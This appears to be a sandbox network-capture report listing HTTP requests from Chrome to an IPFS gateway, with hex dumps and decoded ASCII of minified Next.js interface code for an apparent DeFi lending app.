                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 31 70 78 20 73 6f 6c 69 64 20 24 7b 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 42 61 63 6b 67 72 6f 75 6e 64 7d 60 7d 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 6e 6f 6e 65 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 70 72 69 6d 61 72 79 43 68 61 6e 6e 65 6c 7d 20 2f 20 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 7d 29 60 3a 28 30 2c 73 2e 46 71 29 28 65 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 70 72 69 6d 61 72 79 2c 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76
                                                                                                                                                                                                                                                  Data Ascii: 1px solid ${(e.vars||e).palette.action.disabledBackground}`},"&:hover":{textDecoration:"none",backgroundColor:e.vars?`rgba(${e.vars.palette.text.primaryChannel} / ${e.vars.palette.action.hoverOpacity})`:(0,s.Fq)(e.palette.text.primary,e.palette.action.hov
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6f 72 3a 6e 7d 3d 65 2c 73 3d 7b 72 6f 6f 74 3a 5b 22 72 6f 6f 74 22 2c 6f 26 26 22 73 65 6c 65 63 74 65 64 22 2c 61 26 26 22 64 69 73 61 62 6c 65 64 22 2c 72 26 26 22 66 75 6c 6c 57 69 64 74 68 22 2c 60 73 69 7a 65 24 7b 28 30 2c 63 2e 5a 29 28 69 29 7d 60 2c 6e 5d 7d 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 5a 29 28 73 2c 67 2c 74 29 7d 29 28 7a 29 3b 72 65 74 75 72 6e 28 30 2c 76 2e 6a 73 78 29 28 6d 2c 28 30 2c 61 2e 5a 29 28 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 6e 2e 64 65 66 61 75 6c 74 29 28 77 2e 72 6f 6f 74 2c 73 29 2c 64 69 73 61 62 6c 65 64 3a 70 2c 66 6f 63 75 73 52 69 70 70 6c 65 3a 21 66 2c 72 65 66 3a 74 2c 6f 6e 43 6c 69 63 6b 3a 65 3d 3e 7b 52 26 26 28 52 28 65 2c 24 29 2c 65 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 29 7c 7c 79
                                                                                                                                                                                                                                                  Data Ascii: or:n}=e,s={root:["root",o&&"selected",a&&"disabled",r&&"fullWidth",`size${(0,c.Z)(i)}`,n]};return(0,l.Z)(s,g,t)})(z);return(0,v.jsx)(m,(0,a.Z)({className:(0,n.default)(w.root,s),disabled:p,focusRipple:!f,ref:t,onClick:e=>{R&&(R(e,$),e.defaultPrevented)||y
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 30 30 25 22 7d 2c 7b 5b 60 26 20 2e 24 7b 67 2e 67 72 6f 75 70 65 64 7d 60 5d 3a 28 30 2c 61 2e 5a 29 28 7b 7d 2c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 65 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 3f 7b 22 26 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 6d 61 72 67 69 6e 4c 65 66 74 3a 2d 31 2c 62 6f 72 64 65 72 4c 65 66 74 3a 22 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 62 6f 72 64 65 72 54 6f 70 4c 65 66 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 4c 65 66 74 52 61 64 69 75 73 3a 30 7d 2c 22 26 3a 6e 6f 74 28 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 62 6f 72 64 65 72 54 6f 70 52 69 67 68 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 52 69 67 68 74 52
                                                                                                                                                                                                                                                  Data Ascii: 00%"},{[`& .${g.grouped}`]:(0,a.Z)({},"horizontal"===e.orientation?{"&:not(:first-of-type)":{marginLeft:-1,borderLeft:"1px solid transparent",borderTopLeftRadius:0,borderBottomLeftRadius:0},"&:not(:last-of-type)":{borderTopRightRadius:0,borderBottomRightR
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 66 3a 74 2c 6f 77 6e 65 72 53 74 61 74 65 3a 77 7d 2c 7a 2c 7b 63 68 69 6c 64 72 65 6e 3a 69 2e 43 68 69 6c 64 72 65 6e 2e 6d 61 70 28 73 2c 28 65 3d 3e 69 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 28 65 29 3f 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 65 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 6e 2e 64 65 66 61 75 6c 74 29 28 6b 2e 67 72 6f 75 70 65 64 2c 65 2e 70 72 6f 70 73 2e 63 6c 61 73 73 4e 61 6d 65 29 2c 6f 6e 43 68 61 6e 67 65 3a 79 3f 53 3a 42 2c 73 65 6c 65 63 74 65 64 3a 76 6f 69 64 20 30 3d 3d 3d 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 3f 75 28 65 2e 70 72 6f 70 73 2e 76 61 6c 75 65 2c 78 29 3a 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 2c 73 69 7a 65 3a 65 2e 70 72 6f 70 73 2e 73 69 7a 65 7c 7c 24 2c 66 75 6c 6c 57 69
                                                                                                                                                                                                                                                  Data Ascii: f:t,ownerState:w},z,{children:i.Children.map(s,(e=>i.isValidElement(e)?i.cloneElement(e,{className:(0,n.default)(k.grouped,e.props.className),onChange:y?S:B,selected:void 0===e.props.selected?u(e.props.value,x):e.props.selected,size:e.props.size||$,fullWi
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC438INData Raw: 65 6e 74 52 65 73 75 6c 74 28 29 29 29 2c 6f 2e 75 73 65 45 66 66 65 63 74 28 28 28 29 3d 3e 7b 67 2e 73 65 74 4f 70 74 69 6f 6e 73 28 66 2c 7b 6c 69 73 74 65 6e 65 72 73 3a 21 31 7d 29 7d 29 2c 5b 66 2c 67 5d 29 2c 28 30 2c 63 2e 53 42 29 28 66 2c 68 2c 75 29 29 74 68 72 6f 77 28 30 2c 63 2e 6a 38 29 28 66 2c 67 2c 70 29 3b 69 66 28 28 30 2c 64 2e 4b 4a 29 28 7b 72 65 73 75 6c 74 3a 68 2c 65 72 72 6f 72 52 65 73 65 74 42 6f 75 6e 64 61 72 79 3a 70 2c 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 3a 66 2e 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 2c 71 75 65 72 79 3a 67 2e 67 65 74 43 75 72 72 65 6e 74 51 75 65 72 79 28 29 7d 29 29 74 68 72 6f 77 20 68 2e 65 72 72 6f 72 3b 72 65 74 75 72 6e 20 66 2e 6e 6f 74 69 66 79 4f 6e 43 68 61 6e 67 65 50 72
                                                                                                                                                                                                                                                  Data Ascii: entResult())),o.useEffect((()=>{g.setOptions(f,{listeners:!1})}),[f,g]),(0,c.SB)(f,h,u))throw(0,c.j8)(f,g,p);if((0,d.KJ)({result:h,errorResetBoundary:p,useErrorBoundary:f.useErrorBoundary,query:g.getCurrentQuery()}))throw h.error;return f.notifyOnChangePr


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  40192.168.2.549752209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC504OUTGET /_next/static/chunks/9689.adbfca89f0e04259.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1361INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 13906
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreib2se3lzdro7dhacacdyd4y6zce3tz5icgylijzbxm5ovmzsdl3yq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9689.adbfca89f0e04259.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreib2se3lzdro7dhacacdyd4y6zce3tz5icgylijzbxm5ovmzsdl3yq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-09
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 11527531
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 62 31 66 63 63 30 63 39 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41b1fcc0c9c-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1303INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 36 38 39 5d 2c 7b 38 31 39 30 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 6e 2e 64 28 74 2c 7b 52 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 75 70 70 6c 79 43 61 70 3d 22 73 75 70 70 6c 79 43 61 70 22 2c 65 2e 62 6f 72 72 6f 77 43 61 70 3d 22 62 6f 72 72 6f 77 43 61 70 22 7d 28 72 7c 7c 28 72 3d 7b 7d 29 29 7d 2c 32 35 30 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 59 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9689],{81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},25049:function(e,t,n){n.d(t,{Y:function(){ret
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 72 6f 77 20 63 61 70 20 69 73 20 72 65 61 63 68 65 64 2e 22 7d 29 3b 72 65 74 75 72 6e 28 30 2c 63 2e 6a 73 78 29 28 69 2e 47 2c 75 28 75 28 7b 7d 2c 6e 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 72 7d 29 29 7d 7d 2c 32 35 39 33 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 42 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 35 39 34 39 39 29 2c 6f 3d 6e 28 34 37 33 30 29 2c 61 3d 6e 28 34 39 35 30 31 29 2c 73 3d 6e 28 33 30 31 32 30 29 2c 69 3d 6e 28 39 31 36 35 35 29 2c 63 3d 6e 28 37 30 37 39 34 29 2c 6c 3d 6e 28 35 37 36 30 39 29 2c 70 3d 6e 28 34 31 30 32 34 29 2c 75 3d 6e 28 35 38 35 32 37 29 2c 64 3d 6e 28 38 35 38 39 33 29 2c 78 3d 5b 22 6c 6f 61 64 69 6e 67 22 2c 22 6f
                                                                                                                                                                                                                                                  Data Ascii: row cap is reached."});return(0,c.jsx)(i.G,u(u({},n),{},{children:r}))}},25935:function(e,t,n){n.d(t,{B:function(){return m}});var r=n(59499),o=n(4730),a=n(49501),s=n(30120),i=n(91655),c=n(70794),l=n(57609),p=n(41024),u=n(58527),d=n(85893),x=["loading","o
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 65 73 3a 7b 30 3a 74 3f 28 30 2c 64 2e 6a 73 78 29 28 69 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 72 65 63 74 61 6e 67 75 6c 61 72 22 2c 68 65 69 67 68 74 3a 31 32 2c 77 69 64 74 68 3a 32 35 2c 73 78 3a 7b 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6d 61 72 67 69 6e 4c 65 66 74 3a 22 34 70 78 22 7d 7d 29 3a 28 30 2c 64 2e 6a 73 78 29 28 70 2e 42 2c 7b 76 61 6c 75 65 3a 62 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 32 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 73 78 3a 7b 6d 61 72 67 69 6e 4c 65 66 74 3a 22 34 70 78 22 2c 63 6f 6c 6f 72 3a 66 3f 22 77 61 72 6e 69 6e 67 2e 6d 61 69 6e 22 3a 22 75 6e
                                                                                                                                                                                                                                                  Data Ascii: es:{0:t?(0,d.jsx)(i.Z,{variant:"rectangular",height:12,width:25,sx:{borderRadius:"4px",display:"flex",marginLeft:"4px"}}):(0,d.jsx)(p.B,{value:b,visibleDecimals:2,variant:"secondary12",color:"text.secondary",sx:{marginLeft:"4px",color:f?"warning.main":"un
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 6b 3d 66 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 6f 6e 43 68 61 6e 67 65 2c 72 3d 28 30 2c 6f 2e 5a 29 28 65 2c 50 29 3b 72 65 74 75 72 6e 28 30 2c 5a 2e 6a 73 78 29 28 76 2e 5a 2c 53 28 53 28 7b 7d 2c 72 29 2c 7b 7d 2c 7b 67 65 74 49 6e 70 75 74 52 65 66 3a 74 2c 6f 6e 56 61 6c 75 65 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 76 61 6c 75 65 21 3d 3d 65 2e 76 61 6c 75 65 26 26 6e 28 7b 74 61 72 67 65 74 3a 7b 6e 61 6d 65 3a 65 2e 6e 61 6d 65 2c 76 61 6c 75 65 3a 74 2e 76 61 6c 75 65 7c 7c 22 22 7d 7d 29 7d 2c 74
                                                                                                                                                                                                                                                  Data Ascii: Object.getOwnPropertyDescriptor(n,t))}))}return e}var k=f.forwardRef((function(e,t){var n=e.onChange,r=(0,o.Z)(e,P);return(0,Z.jsx)(v.Z,S(S({},r),{},{getInputRef:t,onValueChange:function(t){t.value!==e.value&&n({target:{name:e.name,value:t.value||""}})},t
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 63 75 73 3a 21 30 2c 6f 6e 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 26 26 28 4e 75 6d 62 65 72 28 65 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 29 3e 4e 75 6d 62 65 72 28 49 29 3f 6f 28 22 2d 31 22 29 3a 6f 28 65 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 29 29 7d 2c 69 6e 70 75 74 50 72 6f 70 73 3a 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 61 6d 6f 75 6e 74 20 69 6e 70 75 74 22 2c 73 74 79 6c 65 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 31 70 78 22 2c 6c 69 6e 65 48 65 69 67 68 74 3a 22 32 38 2c 30 31 70 78 22 2c 70 61 64 64 69 6e 67 3a 30 2c 68 65 69 67 68 74 3a 22 32 38 70 78 22 2c 74 65 78 74 4f 76 65 72 66 6c 6f 77 3a 22 65 6c 6c 69 70 73 69 73 22 2c 77 68 69 74 65 53 70 61 63 65 3a 22 6e 6f 77 72 61 70 22 2c 6f 76 65 72 66 6c 6f 77 3a 22
                                                                                                                                                                                                                                                  Data Ascii: cus:!0,onChange:function(e){o&&(Number(e.target.value)>Number(I)?o("-1"):o(e.target.value))},inputProps:{"aria-label":"amount input",style:{fontSize:"21px",lineHeight:"28,01px",padding:0,height:"28px",textOverflow:"ellipsis",whiteSpace:"nowrap",overflow:"
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 5a 2e 6a 73 78 29 28 77 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 74 2e 69 63 6f 6e 53 79 6d 62 6f 6c 7c 7c 74 2e 73 79 6d 62 6f 6c 2c 61 54 6f 6b 65 6e 3a 74 2e 61 54 6f 6b 65 6e 2c 73 78 3a 7b 6d 72 3a 32 2c 6d 6c 3a 34 7d 7d 29 2c 28 30 2c 5a 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 6d 61 69 6e 31 36 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 70 72 69 6d 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 29 5d 7d 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 4d 7c 7c 76 6f 69 64 20 30 2c 43 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 5a 2e 6a 73 78 29 28 79 2e 5a 2c 7b 76 61 6c 75 65 3a 65 2e 73 79 6d 62 6f 6c 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 73 73 65 74 73 53 65 6c
                                                                                                                                                                                                                                                  Data Ascii: ,children:[(0,Z.jsx)(w.T1,{symbol:t.iconSymbol||t.symbol,aToken:t.aToken,sx:{mr:2,ml:4}}),(0,Z.jsx)(l.Z,{variant:"main16",color:"text.primary",children:e})]})},children:[M||void 0,C.map((function(e){return(0,Z.jsx)(y.Z,{value:e.symbol,"data-cy":"assetsSel
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 74 2e 64 69 73 61 62 6c 65 64 22 7d 29 5d 7d 29 2c 21 76 26 26 28 30 2c 5a 2e 6a 73 78 29 28 62 2e 5a 2c 7b 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 73 78 3a 7b 6d 69 6e 57 69 64 74 68 3a 30 2c 6d 6c 3a 22 37 70 78 22 2c 70 3a 30 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 42 26 26 48 28 42 2e 65 76 65 6e 74 4e 61 6d 65 2c 53 28 7b 7d 2c 42 2e 65 76 65 6e 74 50 61 72 61 6d 73 29 29 2c 6f 28 22 2d 31 22 29 7d 2c 64 69 73 61 62 6c 65 64 3a 66 7c 7c 44 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 5a 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 4d 61 78 22 7d 29 7d 29 5d 7d 29 5d 7d 29 2c 46 26 26 28 30 2c 5a 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 7a 2e 70 61 6c 65 74 74 65 2e 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                                                  Data Ascii: t.disabled"})]}),!v&&(0,Z.jsx)(b.Z,{size:"small",sx:{minWidth:0,ml:"7px",p:0},onClick:function(){B&&H(B.eventName,S({},B.eventParams)),o("-1")},disabled:f||D,children:(0,Z.jsx)(a.cC,{id:"Max"})})]})]}),F&&(0,Z.jsx)(c.Z,{sx:{background:z.palette.background
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 2e 73 79 6d 62 6f 6c 3b 72 65 74 75 72 6e 28 30 2c 6d 2e 6a 73 78 73 29 28 73 2e 68 76 2c 7b 61 73 73 65 74 3a 42 2c 63 68 69 6c 64 72 65 6e 3a 5b 21 45 2e 73 75 63 63 65 73 73 26 26 28 30 2c 6d 2e 6a 73 78 29 28 78 2e 45 2c 7b 74 69 74 6c 65 3a 67 2c 73 79 6d 62 6f 6c 3a 62 3f 76 6f 69 64 20 30 3a 4c 7d 29 2c 4e 26 26 21 77 26 26 28 30 2c 6d 2e 6a 73 78 29 28 68 2e 49 2c 7b 6e 65 74 77 6f 72 6b 4e 61 6d 65 3a 28 30 2c 75 2e 4d 6f 29 28 5f 29 2e 6e 61 6d 65 2c 63 68 61 69 6e 49 64 3a 5f 2c 65 76 65 6e 74 3a 7b 65 76 65 6e 74 4e 61 6d 65 3a 64 2e 76 68 2e 53 57 49 54 43 48 5f 4e 45 54 57 4f 52 4b 2c 65 76 65 6e 74 50 61 72 61 6d 73 3a 7b 61 73 73 65 74 3a 66 7d 7d 7d 29 2c 76 28 7b 69 73 57 72 6f 6e 67 4e 65 74 77 6f 72 6b 3a 4e 2c 6e 61 74 69 76 65 42 61
                                                                                                                                                                                                                                                  Data Ascii: .symbol;return(0,m.jsxs)(s.hv,{asset:B,children:[!E.success&&(0,m.jsx)(x.E,{title:g,symbol:b?void 0:L}),N&&!w&&(0,m.jsx)(h.I,{networkName:(0,u.Mo)(_).name,chainId:_,event:{eventName:d.vh.SWITCH_NETWORK,eventParams:{asset:f}}}),v({isWrongNetwork:N,nativeBa
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 53 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 68 65 61 64 65 72 43 6f 6e 74 65 6e 74 2c 6e 3d 28 30 2c 76 2e 5a 29 28 65 2c 77 29 3b 72 65 74 75 72 6e 28 30 2c 4f 2e 6a 73 78 29 28 67 2e 47 2c 50 28 50 28 7b 65 76 65 6e 74 3a 7b 65 76 65 6e 74 4e 61 6d 65 3a 6a 2e 76 68 2e 54 4f 4f 4c 5f 54 49 50 2c 65 76 65 6e 74 50 61 72 61 6d 73 3a 7b 74 6f 6f 6c 74 69 70 3a 22 53 6c 69 70 70 61 67 65 20 54 6f 6c 6c 65 72 61 6e 63 65 22 7d 7d 7d 2c 6e 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 4f 2e 6a 73 78 73 29 28 4f 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 74 26 26 28 30 2c 4f 2e 6a 73 78 73 29 28 4f 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 74 2c 28 30 2c 4f 2e 6a 73 78 29 28 6d 2e 5a 2c 7b
                                                                                                                                                                                                                                                  Data Ascii: S=function(e){var t=e.headerContent,n=(0,v.Z)(e,w);return(0,O.jsx)(g.G,P(P({event:{eventName:j.vh.TOOL_TIP,eventParams:{tooltip:"Slippage Tollerance"}}},n),{},{children:(0,O.jsxs)(O.Fragment,{children:[t&&(0,O.jsxs)(O.Fragment,{children:[t,(0,O.jsx)(m.Z,{


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  41192.168.2.549754209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC504OUTGET /_next/static/chunks/1497.8e36954048946218.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1357INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 7890
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreialy2r3eqsvrivdf7w7a5srgyd6gx2ba6gzgfrnuoxwodbhrxundu"
